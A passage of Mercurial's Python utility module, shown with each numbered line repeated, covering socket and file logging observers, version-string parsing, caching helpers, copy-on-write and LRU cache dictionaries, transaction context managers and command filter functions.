931 self.fh.write('%s> bufferedreadline() -> %d' % (
931 self.fh.write('%s> bufferedreadline() -> %d' % (
932 self.name, len(res)))
932 self.name, len(res)))
933
933
934 self._writedata(res)
934 self._writedata(res)
935
935
936 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
936 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
937 logdata=False, logdataapis=True):
937 logdata=False, logdataapis=True):
938 """Turn a file object into a logging file object."""
938 """Turn a file object into a logging file object."""
939
939
940 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
940 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
941 logdata=logdata, logdataapis=logdataapis)
941 logdata=logdata, logdataapis=logdataapis)
942 return fileobjectproxy(fh, observer)
942 return fileobjectproxy(fh, observer)
943
943
944 class socketobserver(baseproxyobserver):
944 class socketobserver(baseproxyobserver):
945 """Logs socket activity."""
945 """Logs socket activity."""
946 def __init__(self, fh, name, reads=True, writes=True, states=True,
946 def __init__(self, fh, name, reads=True, writes=True, states=True,
947 logdata=False, logdataapis=True):
947 logdata=False, logdataapis=True):
948 self.fh = fh
948 self.fh = fh
949 self.name = name
949 self.name = name
950 self.reads = reads
950 self.reads = reads
951 self.writes = writes
951 self.writes = writes
952 self.states = states
952 self.states = states
953 self.logdata = logdata
953 self.logdata = logdata
954 self.logdataapis = logdataapis
954 self.logdataapis = logdataapis
955
955
956 def makefile(self, res, mode=None, bufsize=None):
956 def makefile(self, res, mode=None, bufsize=None):
957 if not self.states:
957 if not self.states:
958 return
958 return
959
959
960 self.fh.write('%s> makefile(%r, %r)\n' % (
960 self.fh.write('%s> makefile(%r, %r)\n' % (
961 self.name, mode, bufsize))
961 self.name, mode, bufsize))
962
962
963 def recv(self, res, size, flags=0):
963 def recv(self, res, size, flags=0):
964 if not self.reads:
964 if not self.reads:
965 return
965 return
966
966
967 if self.logdataapis:
967 if self.logdataapis:
968 self.fh.write('%s> recv(%d, %d) -> %d' % (
968 self.fh.write('%s> recv(%d, %d) -> %d' % (
969 self.name, size, flags, len(res)))
969 self.name, size, flags, len(res)))
970 self._writedata(res)
970 self._writedata(res)
971
971
972 def recvfrom(self, res, size, flags=0):
972 def recvfrom(self, res, size, flags=0):
973 if not self.reads:
973 if not self.reads:
974 return
974 return
975
975
976 if self.logdataapis:
976 if self.logdataapis:
977 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
977 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
978 self.name, size, flags, len(res[0])))
978 self.name, size, flags, len(res[0])))
979
979
980 self._writedata(res[0])
980 self._writedata(res[0])
981
981
982 def recvfrom_into(self, res, buf, size, flags=0):
982 def recvfrom_into(self, res, buf, size, flags=0):
983 if not self.reads:
983 if not self.reads:
984 return
984 return
985
985
986 if self.logdataapis:
986 if self.logdataapis:
987 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
987 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
988 self.name, size, flags, res[0]))
988 self.name, size, flags, res[0]))
989
989
990 self._writedata(buf[0:res[0]])
990 self._writedata(buf[0:res[0]])
991
991
992 def recv_into(self, res, buf, size=0, flags=0):
992 def recv_into(self, res, buf, size=0, flags=0):
993 if not self.reads:
993 if not self.reads:
994 return
994 return
995
995
996 if self.logdataapis:
996 if self.logdataapis:
997 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
997 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
998 self.name, size, flags, res))
998 self.name, size, flags, res))
999
999
1000 self._writedata(buf[0:res])
1000 self._writedata(buf[0:res])
1001
1001
1002 def send(self, res, data, flags=0):
1002 def send(self, res, data, flags=0):
1003 if not self.writes:
1003 if not self.writes:
1004 return
1004 return
1005
1005
1006 self.fh.write('%s> send(%d, %d) -> %d' % (
1006 self.fh.write('%s> send(%d, %d) -> %d' % (
1007 self.name, len(data), flags, len(res)))
1007 self.name, len(data), flags, len(res)))
1008 self._writedata(data)
1008 self._writedata(data)
1009
1009
1010 def sendall(self, res, data, flags=0):
1010 def sendall(self, res, data, flags=0):
1011 if not self.writes:
1011 if not self.writes:
1012 return
1012 return
1013
1013
1014 if self.logdataapis:
1014 if self.logdataapis:
1015 # Returns None on success. So don't bother reporting return value.
1015 # Returns None on success. So don't bother reporting return value.
1016 self.fh.write('%s> sendall(%d, %d)' % (
1016 self.fh.write('%s> sendall(%d, %d)' % (
1017 self.name, len(data), flags))
1017 self.name, len(data), flags))
1018
1018
1019 self._writedata(data)
1019 self._writedata(data)
1020
1020
1021 def sendto(self, res, data, flagsoraddress, address=None):
1021 def sendto(self, res, data, flagsoraddress, address=None):
1022 if not self.writes:
1022 if not self.writes:
1023 return
1023 return
1024
1024
1025 if address:
1025 if address:
1026 flags = flagsoraddress
1026 flags = flagsoraddress
1027 else:
1027 else:
1028 flags = 0
1028 flags = 0
1029
1029
1030 if self.logdataapis:
1030 if self.logdataapis:
1031 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
1031 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
1032 self.name, len(data), flags, address, res))
1032 self.name, len(data), flags, address, res))
1033
1033
1034 self._writedata(data)
1034 self._writedata(data)
1035
1035
1036 def setblocking(self, res, flag):
1036 def setblocking(self, res, flag):
1037 if not self.states:
1037 if not self.states:
1038 return
1038 return
1039
1039
1040 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
1040 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
1041
1041
1042 def settimeout(self, res, value):
1042 def settimeout(self, res, value):
1043 if not self.states:
1043 if not self.states:
1044 return
1044 return
1045
1045
1046 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
1046 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
1047
1047
1048 def gettimeout(self, res):
1048 def gettimeout(self, res):
1049 if not self.states:
1049 if not self.states:
1050 return
1050 return
1051
1051
1052 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
1052 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
1053
1053
1054 def setsockopt(self, level, optname, value):
1054 def setsockopt(self, level, optname, value):
1055 if not self.states:
1055 if not self.states:
1056 return
1056 return
1057
1057
1058 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
1058 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
1059 self.name, level, optname, value))
1059 self.name, level, optname, value))
1060
1060
1061 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
1061 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
1062 logdata=False, logdataapis=True):
1062 logdata=False, logdataapis=True):
1063 """Turn a socket into a logging socket."""
1063 """Turn a socket into a logging socket."""
1064
1064
1065 observer = socketobserver(logh, name, reads=reads, writes=writes,
1065 observer = socketobserver(logh, name, reads=reads, writes=writes,
1066 states=states, logdata=logdata,
1066 states=states, logdata=logdata,
1067 logdataapis=logdataapis)
1067 logdataapis=logdataapis)
1068 return socketproxy(fh, observer)
1068 return socketproxy(fh, observer)
1069
1069
1070 def version():
1070 def version():
1071 """Return version information if available."""
1071 """Return version information if available."""
1072 try:
1072 try:
1073 from . import __version__
1073 from . import __version__
1074 return __version__.version
1074 return __version__.version
1075 except ImportError:
1075 except ImportError:
1076 return 'unknown'
1076 return 'unknown'
1077
1077
1078 def versiontuple(v=None, n=4):
1078 def versiontuple(v=None, n=4):
1079 """Parses a Mercurial version string into an N-tuple.
1079 """Parses a Mercurial version string into an N-tuple.
1080
1080
1081 The version string to be parsed is specified with the ``v`` argument.
1081 The version string to be parsed is specified with the ``v`` argument.
1082 If it isn't defined, the current Mercurial version string will be parsed.
1082 If it isn't defined, the current Mercurial version string will be parsed.
1083
1083
1084 ``n`` can be 2, 3, or 4. Here is how some version strings map to
1084 ``n`` can be 2, 3, or 4. Here is how some version strings map to
1085 returned values:
1085 returned values:
1086
1086
1087 >>> v = b'3.6.1+190-df9b73d2d444'
1087 >>> v = b'3.6.1+190-df9b73d2d444'
1088 >>> versiontuple(v, 2)
1088 >>> versiontuple(v, 2)
1089 (3, 6)
1089 (3, 6)
1090 >>> versiontuple(v, 3)
1090 >>> versiontuple(v, 3)
1091 (3, 6, 1)
1091 (3, 6, 1)
1092 >>> versiontuple(v, 4)
1092 >>> versiontuple(v, 4)
1093 (3, 6, 1, '190-df9b73d2d444')
1093 (3, 6, 1, '190-df9b73d2d444')
1094
1094
1095 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1095 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1096 (3, 6, 1, '190-df9b73d2d444+20151118')
1096 (3, 6, 1, '190-df9b73d2d444+20151118')
1097
1097
1098 >>> v = b'3.6'
1098 >>> v = b'3.6'
1099 >>> versiontuple(v, 2)
1099 >>> versiontuple(v, 2)
1100 (3, 6)
1100 (3, 6)
1101 >>> versiontuple(v, 3)
1101 >>> versiontuple(v, 3)
1102 (3, 6, None)
1102 (3, 6, None)
1103 >>> versiontuple(v, 4)
1103 >>> versiontuple(v, 4)
1104 (3, 6, None, None)
1104 (3, 6, None, None)
1105
1105
1106 >>> v = b'3.9-rc'
1106 >>> v = b'3.9-rc'
1107 >>> versiontuple(v, 2)
1107 >>> versiontuple(v, 2)
1108 (3, 9)
1108 (3, 9)
1109 >>> versiontuple(v, 3)
1109 >>> versiontuple(v, 3)
1110 (3, 9, None)
1110 (3, 9, None)
1111 >>> versiontuple(v, 4)
1111 >>> versiontuple(v, 4)
1112 (3, 9, None, 'rc')
1112 (3, 9, None, 'rc')
1113
1113
1114 >>> v = b'3.9-rc+2-02a8fea4289b'
1114 >>> v = b'3.9-rc+2-02a8fea4289b'
1115 >>> versiontuple(v, 2)
1115 >>> versiontuple(v, 2)
1116 (3, 9)
1116 (3, 9)
1117 >>> versiontuple(v, 3)
1117 >>> versiontuple(v, 3)
1118 (3, 9, None)
1118 (3, 9, None)
1119 >>> versiontuple(v, 4)
1119 >>> versiontuple(v, 4)
1120 (3, 9, None, 'rc+2-02a8fea4289b')
1120 (3, 9, None, 'rc+2-02a8fea4289b')
1121 """
1121 """
1122 if not v:
1122 if not v:
1123 v = version()
1123 v = version()
1124 parts = remod.split('[\+-]', v, 1)
1124 parts = remod.split('[\+-]', v, 1)
1125 if len(parts) == 1:
1125 if len(parts) == 1:
1126 vparts, extra = parts[0], None
1126 vparts, extra = parts[0], None
1127 else:
1127 else:
1128 vparts, extra = parts
1128 vparts, extra = parts
1129
1129
1130 vints = []
1130 vints = []
1131 for i in vparts.split('.'):
1131 for i in vparts.split('.'):
1132 try:
1132 try:
1133 vints.append(int(i))
1133 vints.append(int(i))
1134 except ValueError:
1134 except ValueError:
1135 break
1135 break
1136 # (3, 6) -> (3, 6, None)
1136 # (3, 6) -> (3, 6, None)
1137 while len(vints) < 3:
1137 while len(vints) < 3:
1138 vints.append(None)
1138 vints.append(None)
1139
1139
1140 if n == 2:
1140 if n == 2:
1141 return (vints[0], vints[1])
1141 return (vints[0], vints[1])
1142 if n == 3:
1142 if n == 3:
1143 return (vints[0], vints[1], vints[2])
1143 return (vints[0], vints[1], vints[2])
1144 if n == 4:
1144 if n == 4:
1145 return (vints[0], vints[1], vints[2], extra)
1145 return (vints[0], vints[1], vints[2], extra)
1146
1146
1147 def cachefunc(func):
1147 def cachefunc(func):
1148 '''cache the result of function calls'''
1148 '''cache the result of function calls'''
1149 # XXX doesn't handle keywords args
1149 # XXX doesn't handle keywords args
1150 if func.__code__.co_argcount == 0:
1150 if func.__code__.co_argcount == 0:
1151 cache = []
1151 cache = []
1152 def f():
1152 def f():
1153 if len(cache) == 0:
1153 if len(cache) == 0:
1154 cache.append(func())
1154 cache.append(func())
1155 return cache[0]
1155 return cache[0]
1156 return f
1156 return f
1157 cache = {}
1157 cache = {}
1158 if func.__code__.co_argcount == 1:
1158 if func.__code__.co_argcount == 1:
1159 # we gain a small amount of time because
1159 # we gain a small amount of time because
1160 # we don't need to pack/unpack the list
1160 # we don't need to pack/unpack the list
1161 def f(arg):
1161 def f(arg):
1162 if arg not in cache:
1162 if arg not in cache:
1163 cache[arg] = func(arg)
1163 cache[arg] = func(arg)
1164 return cache[arg]
1164 return cache[arg]
1165 else:
1165 else:
1166 def f(*args):
1166 def f(*args):
1167 if args not in cache:
1167 if args not in cache:
1168 cache[args] = func(*args)
1168 cache[args] = func(*args)
1169 return cache[args]
1169 return cache[args]
1170
1170
1171 return f
1171 return f
1172
1172
1173 class cow(object):
1173 class cow(object):
1174 """helper class to make copy-on-write easier
1174 """helper class to make copy-on-write easier
1175
1175
1176 Call preparewrite before doing any writes.
1176 Call preparewrite before doing any writes.
1177 """
1177 """
1178
1178
1179 def preparewrite(self):
1179 def preparewrite(self):
1180 """call this before writes, return self or a copied new object"""
1180 """call this before writes, return self or a copied new object"""
1181 if getattr(self, '_copied', 0):
1181 if getattr(self, '_copied', 0):
1182 self._copied -= 1
1182 self._copied -= 1
1183 return self.__class__(self)
1183 return self.__class__(self)
1184 return self
1184 return self
1185
1185
1186 def copy(self):
1186 def copy(self):
1187 """always do a cheap copy"""
1187 """always do a cheap copy"""
1188 self._copied = getattr(self, '_copied', 0) + 1
1188 self._copied = getattr(self, '_copied', 0) + 1
1189 return self
1189 return self
1190
1190
1191 class sortdict(collections.OrderedDict):
1191 class sortdict(collections.OrderedDict):
1192 '''a simple sorted dictionary
1192 '''a simple sorted dictionary
1193
1193
1194 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1194 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1195 >>> d2 = d1.copy()
1195 >>> d2 = d1.copy()
1196 >>> d2
1196 >>> d2
1197 sortdict([('a', 0), ('b', 1)])
1197 sortdict([('a', 0), ('b', 1)])
1198 >>> d2.update([(b'a', 2)])
1198 >>> d2.update([(b'a', 2)])
1199 >>> list(d2.keys()) # should still be in last-set order
1199 >>> list(d2.keys()) # should still be in last-set order
1200 ['b', 'a']
1200 ['b', 'a']
1201 '''
1201 '''
1202
1202
1203 def __setitem__(self, key, value):
1203 def __setitem__(self, key, value):
1204 if key in self:
1204 if key in self:
1205 del self[key]
1205 del self[key]
1206 super(sortdict, self).__setitem__(key, value)
1206 super(sortdict, self).__setitem__(key, value)
1207
1207
1208 if pycompat.ispypy:
1208 if pycompat.ispypy:
1209 # __setitem__() isn't called as of PyPy 5.8.0
1209 # __setitem__() isn't called as of PyPy 5.8.0
1210 def update(self, src):
1210 def update(self, src):
1211 if isinstance(src, dict):
1211 if isinstance(src, dict):
1212 src = src.iteritems()
1212 src = src.iteritems()
1213 for k, v in src:
1213 for k, v in src:
1214 self[k] = v
1214 self[k] = v
1215
1215
1216 class cowdict(cow, dict):
1216 class cowdict(cow, dict):
1217 """copy-on-write dict
1217 """copy-on-write dict
1218
1218
1219 Be sure to call d = d.preparewrite() before writing to d.
1219 Be sure to call d = d.preparewrite() before writing to d.
1220
1220
1221 >>> a = cowdict()
1221 >>> a = cowdict()
1222 >>> a is a.preparewrite()
1222 >>> a is a.preparewrite()
1223 True
1223 True
1224 >>> b = a.copy()
1224 >>> b = a.copy()
1225 >>> b is a
1225 >>> b is a
1226 True
1226 True
1227 >>> c = b.copy()
1227 >>> c = b.copy()
1228 >>> c is a
1228 >>> c is a
1229 True
1229 True
1230 >>> a = a.preparewrite()
1230 >>> a = a.preparewrite()
1231 >>> b is a
1231 >>> b is a
1232 False
1232 False
1233 >>> a is a.preparewrite()
1233 >>> a is a.preparewrite()
1234 True
1234 True
1235 >>> c = c.preparewrite()
1235 >>> c = c.preparewrite()
1236 >>> b is c
1236 >>> b is c
1237 False
1237 False
1238 >>> b is b.preparewrite()
1238 >>> b is b.preparewrite()
1239 True
1239 True
1240 """
1240 """
1241
1241
1242 class cowsortdict(cow, sortdict):
1242 class cowsortdict(cow, sortdict):
1243 """copy-on-write sortdict
1243 """copy-on-write sortdict
1244
1244
1245 Be sure to call d = d.preparewrite() before writing to d.
1245 Be sure to call d = d.preparewrite() before writing to d.
1246 """
1246 """
1247
1247
1248 class transactional(object):
1248 class transactional(object):
1249 """Base class for making a transactional type into a context manager."""
1249 """Base class for making a transactional type into a context manager."""
1250 __metaclass__ = abc.ABCMeta
1250 __metaclass__ = abc.ABCMeta
1251
1251
1252 @abc.abstractmethod
1252 @abc.abstractmethod
1253 def close(self):
1253 def close(self):
1254 """Successfully closes the transaction."""
1254 """Successfully closes the transaction."""
1255
1255
1256 @abc.abstractmethod
1256 @abc.abstractmethod
1257 def release(self):
1257 def release(self):
1258 """Marks the end of the transaction.
1258 """Marks the end of the transaction.
1259
1259
1260 If the transaction has not been closed, it will be aborted.
1260 If the transaction has not been closed, it will be aborted.
1261 """
1261 """
1262
1262
1263 def __enter__(self):
1263 def __enter__(self):
1264 return self
1264 return self
1265
1265
1266 def __exit__(self, exc_type, exc_val, exc_tb):
1266 def __exit__(self, exc_type, exc_val, exc_tb):
1267 try:
1267 try:
1268 if exc_type is None:
1268 if exc_type is None:
1269 self.close()
1269 self.close()
1270 finally:
1270 finally:
1271 self.release()
1271 self.release()
1272
1272
1273 @contextlib.contextmanager
1273 @contextlib.contextmanager
1274 def acceptintervention(tr=None):
1274 def acceptintervention(tr=None):
1275 """A context manager that closes the transaction on InterventionRequired
1275 """A context manager that closes the transaction on InterventionRequired
1276
1276
1277 If no transaction was provided, this simply runs the body and returns
1277 If no transaction was provided, this simply runs the body and returns
1278 """
1278 """
1279 if not tr:
1279 if not tr:
1280 yield
1280 yield
1281 return
1281 return
1282 try:
1282 try:
1283 yield
1283 yield
1284 tr.close()
1284 tr.close()
1285 except error.InterventionRequired:
1285 except error.InterventionRequired:
1286 tr.close()
1286 tr.close()
1287 raise
1287 raise
1288 finally:
1288 finally:
1289 tr.release()
1289 tr.release()
1290
1290
1291 @contextlib.contextmanager
1291 @contextlib.contextmanager
1292 def nullcontextmanager():
1292 def nullcontextmanager():
1293 yield
1293 yield
1294
1294
1295 class _lrucachenode(object):
1295 class _lrucachenode(object):
1296 """A node in a doubly linked list.
1296 """A node in a doubly linked list.
1297
1297
1298 Holds a reference to nodes on either side as well as a key-value
1298 Holds a reference to nodes on either side as well as a key-value
1299 pair for the dictionary entry.
1299 pair for the dictionary entry.
1300 """
1300 """
1301 __slots__ = (u'next', u'prev', u'key', u'value')
1301 __slots__ = (u'next', u'prev', u'key', u'value')
1302
1302
1303 def __init__(self):
1303 def __init__(self):
1304 self.next = None
1304 self.next = None
1305 self.prev = None
1305 self.prev = None
1306
1306
1307 self.key = _notset
1307 self.key = _notset
1308 self.value = None
1308 self.value = None
1309
1309
1310 def markempty(self):
1310 def markempty(self):
1311 """Mark the node as emptied."""
1311 """Mark the node as emptied."""
1312 self.key = _notset
1312 self.key = _notset
1313
1313
1314 class lrucachedict(object):
1314 class lrucachedict(object):
1315 """Dict that caches most recent accesses and sets.
1315 """Dict that caches most recent accesses and sets.
1316
1316
1317 The dict consists of an actual backing dict - indexed by original
1317 The dict consists of an actual backing dict - indexed by original
1318 key - and a doubly linked circular list defining the order of entries in
1318 key - and a doubly linked circular list defining the order of entries in
1319 the cache.
1319 the cache.
1320
1320
1321 The head node is the newest entry in the cache. If the cache is full,
1321 The head node is the newest entry in the cache. If the cache is full,
1322 we recycle head.prev and make it the new head. Cache accesses result in
1322 we recycle head.prev and make it the new head. Cache accesses result in
1323 the node being moved to before the existing head and being marked as the
1323 the node being moved to before the existing head and being marked as the
1324 new head node.
1324 new head node.
1325 """
1325 """
1326 def __init__(self, max):
1326 def __init__(self, max):
1327 self._cache = {}
1327 self._cache = {}
1328
1328
1329 self._head = head = _lrucachenode()
1329 self._head = head = _lrucachenode()
1330 head.prev = head
1330 head.prev = head
1331 head.next = head
1331 head.next = head
1332 self._size = 1
1332 self._size = 1
1333 self._capacity = max
1333 self._capacity = max
1334
1334
1335 def __len__(self):
1335 def __len__(self):
1336 return len(self._cache)
1336 return len(self._cache)
1337
1337
1338 def __contains__(self, k):
1338 def __contains__(self, k):
1339 return k in self._cache
1339 return k in self._cache
1340
1340
1341 def __iter__(self):
1341 def __iter__(self):
1342 # We don't have to iterate in cache order, but why not.
1342 # We don't have to iterate in cache order, but why not.
1343 n = self._head
1343 n = self._head
1344 for i in range(len(self._cache)):
1344 for i in range(len(self._cache)):
1345 yield n.key
1345 yield n.key
1346 n = n.next
1346 n = n.next
1347
1347
1348 def __getitem__(self, k):
1348 def __getitem__(self, k):
1349 node = self._cache[k]
1349 node = self._cache[k]
1350 self._movetohead(node)
1350 self._movetohead(node)
1351 return node.value
1351 return node.value
1352
1352
1353 def __setitem__(self, k, v):
1353 def __setitem__(self, k, v):
1354 node = self._cache.get(k)
1354 node = self._cache.get(k)
1355 # Replace existing value and mark as newest.
1355 # Replace existing value and mark as newest.
1356 if node is not None:
1356 if node is not None:
1357 node.value = v
1357 node.value = v
1358 self._movetohead(node)
1358 self._movetohead(node)
1359 return
1359 return
1360
1360
1361 if self._size < self._capacity:
1361 if self._size < self._capacity:
1362 node = self._addcapacity()
1362 node = self._addcapacity()
1363 else:
1363 else:
1364 # Grab the last/oldest item.
1364 # Grab the last/oldest item.
1365 node = self._head.prev
1365 node = self._head.prev
1366
1366
1367 # At capacity. Kill the old entry.
1367 # At capacity. Kill the old entry.
1368 if node.key is not _notset:
1368 if node.key is not _notset:
1369 del self._cache[node.key]
1369 del self._cache[node.key]
1370
1370
1371 node.key = k
1371 node.key = k
1372 node.value = v
1372 node.value = v
1373 self._cache[k] = node
1373 self._cache[k] = node
1374 # And mark it as newest entry. No need to adjust order since it
1374 # And mark it as newest entry. No need to adjust order since it
1375 # is already self._head.prev.
1375 # is already self._head.prev.
1376 self._head = node
1376 self._head = node
1377
1377
1378 def __delitem__(self, k):
1378 def __delitem__(self, k):
1379 node = self._cache.pop(k)
1379 node = self._cache.pop(k)
1380 node.markempty()
1380 node.markempty()
1381
1381
1382 # Temporarily mark as newest item before re-adjusting head to make
1382 # Temporarily mark as newest item before re-adjusting head to make
1383 # this node the oldest item.
1383 # this node the oldest item.
1384 self._movetohead(node)
1384 self._movetohead(node)
1385 self._head = node.next
1385 self._head = node.next
1386
1386
1387 # Additional dict methods.
1387 # Additional dict methods.
1388
1388
1389 def get(self, k, default=None):
1389 def get(self, k, default=None):
1390 try:
1390 try:
1391 return self._cache[k].value
1391 return self._cache[k].value
1392 except KeyError:
1392 except KeyError:
1393 return default
1393 return default
1394
1394
1395 def clear(self):
1395 def clear(self):
1396 n = self._head
1396 n = self._head
1397 while n.key is not _notset:
1397 while n.key is not _notset:
1398 n.markempty()
1398 n.markempty()
1399 n = n.next
1399 n = n.next
1400
1400
1401 self._cache.clear()
1401 self._cache.clear()
1402
1402
1403 def copy(self):
1403 def copy(self):
1404 result = lrucachedict(self._capacity)
1404 result = lrucachedict(self._capacity)
1405 n = self._head.prev
1405 n = self._head.prev
1406 # Iterate in oldest-to-newest order, so the copy has the right ordering
1406 # Iterate in oldest-to-newest order, so the copy has the right ordering
1407 for i in range(len(self._cache)):
1407 for i in range(len(self._cache)):
1408 result[n.key] = n.value
1408 result[n.key] = n.value
1409 n = n.prev
1409 n = n.prev
1410 return result
1410 return result
1411
1411
1412 def _movetohead(self, node):
1412 def _movetohead(self, node):
1413 """Mark a node as the newest, making it the new head.
1413 """Mark a node as the newest, making it the new head.
1414
1414
1415 When a node is accessed, it becomes the freshest entry in the LRU
1415 When a node is accessed, it becomes the freshest entry in the LRU
1416 list, which is denoted by self._head.
1416 list, which is denoted by self._head.
1417
1417
1418 Visually, let's make ``N`` the new head node (* denotes head):
1418 Visually, let's make ``N`` the new head node (* denotes head):
1419
1419
1420 previous/oldest <-> head <-> next/next newest
1420 previous/oldest <-> head <-> next/next newest
1421
1421
1422 ----<->--- A* ---<->-----
1422 ----<->--- A* ---<->-----
1423 | |
1423 | |
1424 E <-> D <-> N <-> C <-> B
1424 E <-> D <-> N <-> C <-> B
1425
1425
1426 To:
1426 To:
1427
1427
1428 ----<->--- N* ---<->-----
1428 ----<->--- N* ---<->-----
1429 | |
1429 | |
1430 E <-> D <-> C <-> B <-> A
1430 E <-> D <-> C <-> B <-> A
1431
1431
1432 This requires the following moves:
1432 This requires the following moves:
1433
1433
1434 C.next = D (node.prev.next = node.next)
1434 C.next = D (node.prev.next = node.next)
1435 D.prev = C (node.next.prev = node.prev)
1435 D.prev = C (node.next.prev = node.prev)
1436 E.next = N (head.prev.next = node)
1436 E.next = N (head.prev.next = node)
1437 N.prev = E (node.prev = head.prev)
1437 N.prev = E (node.prev = head.prev)
1438 N.next = A (node.next = head)
1438 N.next = A (node.next = head)
1439 A.prev = N (head.prev = node)
1439 A.prev = N (head.prev = node)
1440 """
1440 """
1441 head = self._head
1441 head = self._head
1442 # C.next = D
1442 # C.next = D
1443 node.prev.next = node.next
1443 node.prev.next = node.next
1444 # D.prev = C
1444 # D.prev = C
1445 node.next.prev = node.prev
1445 node.next.prev = node.prev
1446 # N.prev = E
1446 # N.prev = E
1447 node.prev = head.prev
1447 node.prev = head.prev
1448 # N.next = A
1448 # N.next = A
1449 # It is tempting to do just "head" here, however if node is
1449 # It is tempting to do just "head" here, however if node is
1450 # adjacent to head, this will do bad things.
1450 # adjacent to head, this will do bad things.
1451 node.next = head.prev.next
1451 node.next = head.prev.next
1452 # E.next = N
1452 # E.next = N
1453 node.next.prev = node
1453 node.next.prev = node
1454 # A.prev = N
1454 # A.prev = N
1455 node.prev.next = node
1455 node.prev.next = node
1456
1456
1457 self._head = node
1457 self._head = node
1458
1458
1459 def _addcapacity(self):
1459 def _addcapacity(self):
1460 """Add a node to the circular linked list.
1460 """Add a node to the circular linked list.
1461
1461
1462 The new node is inserted before the head node.
1462 The new node is inserted before the head node.
1463 """
1463 """
1464 head = self._head
1464 head = self._head
1465 node = _lrucachenode()
1465 node = _lrucachenode()
1466 head.prev.next = node
1466 head.prev.next = node
1467 node.prev = head.prev
1467 node.prev = head.prev
1468 node.next = head
1468 node.next = head
1469 head.prev = node
1469 head.prev = node
1470 self._size += 1
1470 self._size += 1
1471 return node
1471 return node
1472
1472
1473 def lrucachefunc(func):
1473 def lrucachefunc(func):
1474 '''cache most recent results of function calls'''
1474 '''cache most recent results of function calls'''
1475 cache = {}
1475 cache = {}
1476 order = collections.deque()
1476 order = collections.deque()
1477 if func.__code__.co_argcount == 1:
1477 if func.__code__.co_argcount == 1:
1478 def f(arg):
1478 def f(arg):
1479 if arg not in cache:
1479 if arg not in cache:
1480 if len(cache) > 20:
1480 if len(cache) > 20:
1481 del cache[order.popleft()]
1481 del cache[order.popleft()]
1482 cache[arg] = func(arg)
1482 cache[arg] = func(arg)
1483 else:
1483 else:
1484 order.remove(arg)
1484 order.remove(arg)
1485 order.append(arg)
1485 order.append(arg)
1486 return cache[arg]
1486 return cache[arg]
1487 else:
1487 else:
1488 def f(*args):
1488 def f(*args):
1489 if args not in cache:
1489 if args not in cache:
1490 if len(cache) > 20:
1490 if len(cache) > 20:
1491 del cache[order.popleft()]
1491 del cache[order.popleft()]
1492 cache[args] = func(*args)
1492 cache[args] = func(*args)
1493 else:
1493 else:
1494 order.remove(args)
1494 order.remove(args)
1495 order.append(args)
1495 order.append(args)
1496 return cache[args]
1496 return cache[args]
1497
1497
1498 return f
1498 return f
1499
1499
1500 class propertycache(object):
1500 class propertycache(object):
1501 def __init__(self, func):
1501 def __init__(self, func):
1502 self.func = func
1502 self.func = func
1503 self.name = func.__name__
1503 self.name = func.__name__
1504 def __get__(self, obj, type=None):
1504 def __get__(self, obj, type=None):
1505 result = self.func(obj)
1505 result = self.func(obj)
1506 self.cachevalue(obj, result)
1506 self.cachevalue(obj, result)
1507 return result
1507 return result
1508
1508
1509 def cachevalue(self, obj, value):
1509 def cachevalue(self, obj, value):
1510 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1510 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1511 obj.__dict__[self.name] = value
1511 obj.__dict__[self.name] = value
1512
1512
1513 def clearcachedproperty(obj, prop):
1513 def clearcachedproperty(obj, prop):
1514 '''clear a cached property value, if one has been set'''
1514 '''clear a cached property value, if one has been set'''
1515 if prop in obj.__dict__:
1515 if prop in obj.__dict__:
1516 del obj.__dict__[prop]
1516 del obj.__dict__[prop]
1517
1517
1518 def pipefilter(s, cmd):
1518 def pipefilter(s, cmd):
1519 '''filter string S through command CMD, returning its output'''
1519 '''filter string S through command CMD, returning its output'''
1520 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1520 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1521 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
1521 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
1522 pout, perr = p.communicate(s)
1522 pout, perr = p.communicate(s)
1523 return pout
1523 return pout
1524
1524
1525 def tempfilter(s, cmd):
1525 def tempfilter(s, cmd):
1526 '''filter string S through a pair of temporary files with CMD.
1526 '''filter string S through a pair of temporary files with CMD.
1527 CMD is used as a template to create the real command to be run,
1527 CMD is used as a template to create the real command to be run,
1528 with the strings INFILE and OUTFILE replaced by the real names of
1528 with the strings INFILE and OUTFILE replaced by the real names of
1529 the temporary files generated.'''
1529 the temporary files generated.'''
1530 inname, outname = None, None
1530 inname, outname = None, None
1531 try:
1531 try:
1532 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
1532 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
1533 fp = os.fdopen(infd, r'wb')
1533 fp = os.fdopen(infd, r'wb')
1534 fp.write(s)
1534 fp.write(s)
1535 fp.close()
1535 fp.close()
1536 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
1536 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
1537 os.close(outfd)
